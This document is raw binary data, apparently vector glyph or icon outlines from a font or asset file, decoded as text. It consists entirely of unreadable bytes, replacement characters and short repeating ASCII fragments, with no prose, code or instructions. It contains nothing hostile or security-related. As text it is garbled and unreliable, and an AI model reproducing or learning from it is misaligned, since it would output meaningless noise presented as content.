@`�@@�ਨ��@�`"2CTah%#!"&5463!;!"3!;!2#!"&=46";26=4&+";26=4&+'#353735#'#37#�%� %&@&���(88( �
��� &%��&%&% &% 

 

 �0       P0 @ @ �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
@`�@@�ਨ��@`5<Lamv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46;26=#+"&=#7532+#732654&##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%% & 
 
 �`%&@  @

�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&� &%��

 @@%%`�@

`@
`
 %`&� @�`"2GS\u%#!"&5463!;!"3!;!2#!"&=46;26=#+"&=#73532654&+32654&##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%% & 
 
 � @&%` @

�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&� &%��

 @�`%% @

`@
`
 %`&� @`5<LXcp5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#3#5373#%#5'53753����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�����`��  V*pp*j @ 00  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ 
V�VVpp````  HH  @�`"2>IV%#!"&5463!;!"3!;"3!26=4&#3#53#3#5373#%#5'53753�%� %&@&���(88( �
���%& %&������`��  V*pp*j @ 00 �@%&�&�%@8(�(8�
�&�%&�%�@ � @ 
V�VVpp````  HH  `5<LRZfs!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&##53%3535#53#5##53!'#353735#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� �� @�@  `  �0        8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%� ���  @`�``�``�@@���`"28@LY%#!"&5463!;!"3!;!2#!"&=46#5#3%3535##5#35335#'#353735#`%� %&@&��`(88(��
��`�&&� &&�� ��  @�@`  `  P0       �@%&�&�%@8(�(8�
�%�&%�&����  @`�``�``�@@��@`5<Lm��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�& %& & 
 

 
 `&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%&`%%

`

�%%


&%%


%%%


&%%


%@�`"2S��%#!"&5463!;!"3!;!2#!"&=46#+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%� 
 

 
 & &% &`&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&�

`

%%`&%�%%


&%%


%%%


&%%


%
`5<LShv���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#73#'3;26=#+"&=#!##546;2#'"354&+##546;2#'"354&+`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&��0 @ @ �`% & 
 
 @` & % @
`
 �` & % @
`
  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%��� &%��

 `�%%��
  
``�%%��
  
	�`"29N\gu�%#!"&5463!;!"3!;"3!26=4&#73#'33;26=3+"&=!##546;2#'"354&+##546;2#'"354&+`%� %&@&��`(88(��
��`&&�&&��0 @ @ �` 
 
 & %@` & % @
`
 �` & % @
`
 �@%&�&�%@8(�(8�
�&�%&�%��� 

��%& `�%%��
  
``�%%��
  
	@`5<LXa���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#7";2+"&51#1;2654&+"&546;234&+;2+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�&% 

 
 % &% 

 
 % �`%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 %%


&%%


%&`%� �
`
@�`"2>Gv��%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#7";2+"&51#1;2654&+"&546;234&+3326=4&+326=4&+�%� %&@&���(88( �
��� &%��&% @&%` @

�&% 

 
 % &% 

 
 % �`&%` @

@�@%&�&�%@8(�(8�
�%�&%�&��`%% @

 %%


&%%


%�%`& �
`
@`5<LXfq5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535###546;2#'"354&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ `  ``` & % @
`
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �  ``�%%��
  
@�`"2>LW%#!"&5463!;!"3!;"3!26=4&##53#3#53'##546;2#'"354&+�%� %&@&���(88( �
���%& %&� `  ` �` & % @
`
 �@%&�&�%@8(�(8�
�&�%&�%`  �  @`�%%��
  

@`5<L\en{��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+732654&#32654&#7'#353735#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%

&` @

@@

�0       @`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�x%		%�@

`@

 `�@@��@@%%`�@

	@�`"2BKTamv%#!"&5463!;!"3!;!2#!"&=4632654&'>54&+32654&#32654&#7'#353735#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%`&

%` @

@@

�0       @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�h%		% @

`@

 `�@@��@�`%% @

@`5<LZep�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#'#537353%32+5326=4&+#"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k00      ��`%&` @

@�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��``�@@���&`%� �
`
`@
`
 %`&� @�`"2@KVo%#!"&5463!;!"3!;!2#!"&=4635#'#5#37%326=4&+326=4&+#"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%k      00��`&%` @

@�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&���@@��``��%`& �
`
`@
`
 %`&� @`5<LXdm�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#37532+#732654&#7";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;����`@`%&@  @

�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ @@%%`�@

 %%


&%%


%@�`"2>JS�%#!"&5463!;!"3!;!2#!"&=4635#535#35#73532654&+32654&#7";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%;``����� @&%` @

�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&� @ � ��`%% @

 %%


&%%


%`5<LT`jt!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#3535#3#35#535#535#35353535#3535`@(88(��%� %&`� ��(88(@�%��

�
�
v��&%�&%�� @�� `  `��� ``�� ` 8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%`��  �  �  @@ �` @ �` �`"2:FPZ%#!"&5463!;!"3!;!2#!"&=463535#3#35#535#535#35353535#3535`%� %&@&���(88(`�
����%&�`%&Z @�� `  `��� ``�� `�@%&�&�%@8(�(8�
�%�&%�&`��  �  �  @@ �` @ �` @`5<L\mu�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 � @�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
��   %%


&%%


%@�`"2BS[�%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 � @�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
��   %%


&%%


%	@`5<LXamy�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#53#5##537532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�  `  �`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

@`�``�` @%%`�@

@�`"2>GS_h%#!"&5463!;!"3!;!2#!"&=463532654&+32654&##5#35335#3532654&+32654&#�%� %&@&���(88( �
��� &%��&% @&%` @

�`  `  @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&��`%% @

@`�``�@�`%% @

@�`5<LXan5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&##5'53753����&%�%�(88(� 
� 

@%���(88(`��v
� &%��&%{`%&@  @

� @ 00  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

````  HH  @�`"2>GT%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#75#'5#3�%� %&@&���(88(��
��� &%��&%{ @&%` @

�@ 00 @ �@%&�&�%@8(�(8�
�%�&%�&��`%% @

``  HH  ``@�`5<Lm32+#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#+"&=46;2#4&+";2653��(88(�%� %&`� ��(88( �%��

�
�
v��%& %&�& %& & 
 

 
  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�%&`%%

`

@�`"2S%#!"&5463!;!"3!;"3!26=4&#+"&=46;2#4&+";2653�%� %&@&���(88(@�
���%& %&�& %& & 
 

 
 �@%&�&�%@8(�(8�
�&�%&�%�%&`%%

`

@�`*C`gw��%7'>=4&+";267'#"&=46;2'5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46";2+"&51#1;2654&+"&546;234&##53�% &% 

 
,"'���&%�%�(88(� 
� 

@%���(88( ��v
� &%��&%[&% 

 
 % &% 

 
 %�� �	`&%`&
`

`
," `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@%%


&%%


%� �@�`"2I]��%#!"&5463!;!"3!;"3!26=4&#+"&=46;2''#"&=46;2''32#4&+";2+"&5131;2654&+"&546#53�%� %&@&���(88(@�
���%& %&� %& %

 
,"� % 
 

 %& % 
 

 %&�� �@%&�&�%@8(�(8�
�&�%&�%��&`%&`	
`

`
,"�%


%%&


%%� �	@�`5<LZcs|�5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&#532+732654&#32654&#����&%�%�(88(� 
� 

@%���(88( ��v
� &%��&%� `%%@&Z@

``%

&` @

@@

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

Xx%		%�@

`@

@�`"2@IYbk%#!"&5463!;!"3!;"3!26=4&###532##'32654&#532+732654&#32654&#�%� %&@&���(88(@�
���%& %&�z `%%@&Z@

``%

&` @

@@

�@%&�&�%@8(�(8�
�&�%&�%�`�%%`�@

Xx%		%�@

`@

	@`5<Lmy���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46+"&=46;2#4&+";26537532+#732654&#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�& %& & 
 

 
  `%&@  @

``%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%&`%%

`

`@%%`�@

 @%%`�@

@�`"2S_ht}%#!"&5463!;!"3!;!2#!"&=46#+"&=46;234&+";26573532654&+32654&#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� 
 

 
 & &% &  @&%` @

` @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�

`

%%`&%`�`%% @

 �`%% @

@`5<LTm{�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535##"&=46;5#";5#33##546;2#'"354&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@@

``&%``@�` & % @
`
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  `@
`
 %`&� `�%%��
  
@�`"2:Sal%#!"&5463!;!"3!;!2#!"&=463535##"&=46;5#";5#33354&+"357"354&+�%� %&@&���(88( �
��� &%��&%[ @�@@

``&%``@� % &  
`
 �@%&�&�%@8(�(8�
�%�&%�&`��  `@
`
 %`&� `�%%�``
  
@`5<LXcnx5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#'32+5326=4&+535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%@ 00 @@ 00 �`%&` @

@��� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT�&`%� �
`
@@ �` @�`"2>IT^%#!"&5463!;!"3!;!2#!"&=46373'7#'##326=4&+326=4&+535#3535�%� %&@&���(88( �
��� &%��&%@ 00 @@ 00 �`&%` @

@��� `�@%&�&�%@8(�(8�
�%�&%�&�pTTppTT�%`& �
`
@@ �` 	@`5<LWbr��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+732+"&=46";26=4&++"&=46;2#4&+";2653����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@� %& %&

 

  & %& & 
 

 
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

@�`"2=HYj�%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&+";26=4&+#+"&=46;234&+";265�%� %&@&���(88( �
��� &%��&%`&%` @

@�&% &% 

 

   
 

 
 & &% &�@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%	@`5<L\mx��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+732+5326=4&+33535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 �`%&` @

@� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
 &`%� �
`
��  @�`"2BS^iq%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+7326=4&+326=4&+33535#�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 �`&%` @

@� @��@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
 �%`& �
`
��  @`5<LX^�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#%#537";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[@ 00 @@ 00 `� �&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT  �%%


&%%


%@�`"2>Dr%#!"&5463!;!"3!;"3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546�%� %&@&���(88( �
���%& %&� @ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@%&�&�%@8(�(8�
�&�%&�%�pTTppTT  �%


%%&


%%
`5<LWbr���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#32+5326=4&+732+"&=46";26=4&++"&=46;2#4&+";26537'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� `%&` @

@� %& %&

 

  & %& & 
 

 
 `@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

0pTTppTT	�`"2=HXi��%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&#";26=4&+#+"&=46;234&+";2657373'7#'#`%� %&@&��`(88(��
��`�&&� &&`&%` @

@�&% &% 

 

   
 

 
 & &% &`@ 00 @@ 00 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%0pTTppTT	@`5<LXamv~5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#532+#732654&#!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&@  @

��`%&@  @

` @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 @%%`�@

��  @�`"2>GS\d%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#3532654&+32654&#!3535#�%� %&@&���(88( �
��� &%��&%� @&%` @

�� @&%` @

` @��@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �`%% @

��  	@`5<LZe���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+7";2+"&51#1;2654&+"&546;234&+532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �&% 

 
 % &% 

 
 % �`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 %%


&%%


%@@%%`�@

@�`"2@Kz��%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+7";2+"&51#1;2654&+"&546;234&+3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� % &  
`
 �&% 

 
 % &% 

 
 % � @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 %%


&%%


%@�`%% @

@`5<LXy�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535#+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ `  ` & %& & 
 

 
 `&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �  �%&`%%

`

�%%


&%%


%@�`"2>_�%#!"&5463!;!"3!;!2#!"&=46#35#535##+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[ `  `  
 

 
 & &% &`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&`�  �  �

`

%%`&%�%%


&%%


%	@`5<LZep{�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+%32+5326=4&+!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[` & % @
`
 �`%&` @

@� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 &`%� �
`
��  @�`"2@KVai%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+%326=4&+326=4&+!3535#�%� %&@&���(88( �
��� &%��&%[ % &  
`
 �`&%` @

@� @��@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 �%`& �
`
��  @`5<LXek5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#%'#353735##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[@ 00 @@ 00 0       �  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT�`�@@�� �@�`"2>KQ%#!"&5463!;!"3!;"3!26=4&#'373#'#%73#5#'#53#53�%� %&@&���(88( �
���%& %&� @ 00 @@ 00 0       @� �@%&�&�%@8(�(8�
�&�%&�%�pTTppTT�`�@@�� �@`5<LYfl5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#5'53753'#353735##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ @ 00 p0       �  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�```  HH  @`�@@�� �@�`"2?LR%#!"&5463!;!"3!;"3!26=4&##5'5375373#5#'#53#53�%� %&@&���(88( �
���%& %&�@ @ 00 p0       @� �@%&�&�%@8(�(8�
�&�%&�%�```  HH  @`�@@�� �@`5<LX5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4653#5##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[  `   `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�``�`@�`"2>%#!"&5463!;!"3!;"3!26=4&#53#5##53�%� %&@&���(88( �
���%& %&�  `  �@%&�&�%@8(�(8�
�&�%&�%�`�``�`@`5<LXdp5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#37'373#'#73#53#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;����`�@ 00 @@ 00 ���` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ pTTppTT`@ � @ @�`"2>JV%#!"&5463!;!"3!;"3!26=4&#3#53#37'373#'#73#53#3�%� %&@&���(88( �
���%& %&�����`�@ 00 @@ 00 ���`�@%&�&�%@8(�(8�
�&�%&�%�@ � @ pTTppTT`@ � @ @`5<LZelx5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+73#'3#35#535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �0 @ @ � `  ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
���� �  �  @�`"2@KR^%#!"&5463!;!"3!;"3!26=4&###546;2#'"354&+73#'3#53#3#53�%� %&@&���(88( �
���%& %&��` & % @
`
 �0 @ @ � `  ` �@%&�&�%@8(�(8�
�&�%&�%�`�%%��
  
����   �  
@`5<LWbnw��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+532+#732654&#%32+"&=46";26=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&` @

@�`%&@  @

�` %& %&

 

  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 @%%`�@

 &`%&`% 
`

`
	@�`"2=HT]m~%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+3532654&+32654&#%";26=4&#";26=4&+�%� %&@&���(88( �
��� &%��&%�`&%` @

@� @&%` @

�`&% &% 

 

 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 �`%% @

 %`&%`& 
`

`

`5<LWbr���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#32+5326=4&+732+"&=46";26=4&+33535#'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� `%&` @

@� %& %&

 

 � @�@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%@&`%� �
`
 &`%&`% 
`

`
��  PpTTppTT	�`"2=HXiq}%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&#";26=4&+33535#373'7#'#`%� %&@&��`(88(��
��`�&&� &&`&%` @

@�&% &% 

 

 � @�@ 00 @@ 00 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
��  PpTTppTT`5<LX^��!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#'373#'#%#537";2+"&51#1;2654&+"&546;234&+'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&�`@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�pTTppTT  �%%


&%%


%ppTTppTT�`"2>Dr~%#!"&5463!;!"3!;"3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546'373#'#`%� %&@&��`(88(��
��`&&�&&�`@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@ 00 @@ 00 �@%&�&�%@8(�(8�
�&�%&�%�pTTppTT  �%


%%&


%%ppTTppTT	@`5<L\mx��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+732+5326=4&+7";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 �`%&` @

@�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
 &`%� �
`
 %%


&%%


%@�`"2BS^i�%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+7326=4&+326=4&+7";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 �`&%` @

@�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
 �%`& �
`
 %%


&%%


%	@`5<LXamv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#532+#732654&#%";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&@  @

��`%&@  @

`&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 @%%`�@

 %%


&%%


%@�`"2>GS\�%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%� @&%` @

�� @&%` @

`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �`%% @

 %%


&%%


%	@`5<LWbr��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+732+"&=46";26=4&+33535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@� %& %&

 

 � @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 &`%&`% 
`

`
��  @�`"2=HYjr%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&+";26=4&+33535#�%� %&@&���(88( �
��� &%��&%`&%` @

@�&% &% 

 

 � @��@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
��  @`5<LT`h5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535#'373#'#%3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@ 00 @@ 00  @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  PpTTppTT���  @�`"2:FN%#!"&5463!;!"3!;!2#!"&=463535#373'7#'#3535#�%� %&@&���(88( �
��� &%��&%[ @�@ 00 @@ 00  @��@%&�&�%@8(�(8�
�%�&%�&`��  PpTTppTT ��  @`5<LZcku5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&#33535#535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%U `%%@&Z@

� @�� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

��  @@ �` @�`"2@IQ[%#!"&5463!;!"3!;!2#!"&=463'2654&+35532654&#33535#535#3535�%� %&@&���(88( �
��� &%��&%U@&@%%` @

� @�� `�@%&�&�%@8(�(8�
�%�&%�&�``%%�``@

��  @@ �` @`5<LY\gn5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735##73535#5#73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       �::    `0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��Pp@@ �� ���@�`"2?BMT%#!"&5463!;!"3!;!2#!"&=46'#353735#53535#5#'#37#�%� %&@&���(88( �
��� &%��&%k0       �::    `0 @ @ �@%&�&�%@8(�(8�
�%�&%�&�`�@@��PP @@ �� ���@`5<LV\c5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46535#3535#53?3#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;�� `� �0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ �` ` ����@�`"2<BI%#!"&5463!;!"3!;"3!26=4&#3##53##53?3#'3�%� %&@&���(88( �
���%& %&�`` ��@� �0 @ @ �@%&�&�%@8(�(8�
�&�%&�%� `� � ����@`5<LYen�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735#532+#732654&##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       @`%&@  @

�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��@@%%`�@

`@
`
 %`&� @�`"2?KTm%#!"&5463!;!"3!;!2#!"&=46'#353735#3532654&+32654&##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%k0       @ @&%` @

�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&�`�@@��@�`%% @

`@
`
 %`&� @`*C`gw%7'>=4&+";267'#"&=46;2'5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535#V% &% 

 
,"g���&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ @��	`&%`&
`

`
," `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  @�`"2I]e%#!"&5463!;!"3!;"3!26=4&#+"&=46;2''#"&=46;2'7#53##�%� %&@&���(88( �
���%& %&�� %& %

 
,"�@�@ �@%&�&�%@8(�(8�
�&�%&�%��&`%&`	
`

`
,"�  �@`5<LYep{5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735##35#535#732+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�0       ` `  `�`%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@�� �  �   &`%� �
`
@�`"2?KVa%#!"&5463!;!"3!;!2#!"&=46'#353735##35#535#7326=4&+326=4&+�%� %&@&���(88( �
��� &%��&%�0       ` `  `�`&%` @

@�@%&�&�%@8(�(8�
�%�&%�&�`�@@�� �  �   �%`& �
`
